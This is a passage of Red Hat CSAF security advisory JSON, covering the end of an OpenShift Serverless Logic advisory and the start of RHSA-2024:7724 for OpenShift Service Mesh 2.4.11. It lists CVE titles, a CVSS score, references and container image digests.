"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
}
]
}
rhsa-2024_7724
Vulnerability from csaf_redhat
Published
2024-10-07 09:22
Modified
2024-11-06 07:10
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.4.11
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.4.11\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7724",
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7724.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11",
"tracking": {
"current_release_date": "2024-11-06T07:10:38+00:00",
"generator": {
"date": "2024-11-06T07:10:38+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:7724",
"initial_release_date": "2024-10-07T09:22:37+00:00",
"revision_history": [
{
"date": "2024-10-07T09:22:37+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:22:37+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-06T07:10:38+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.4 for RHEL 8",
"product": {
"name": "RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"product_identification_helper": {
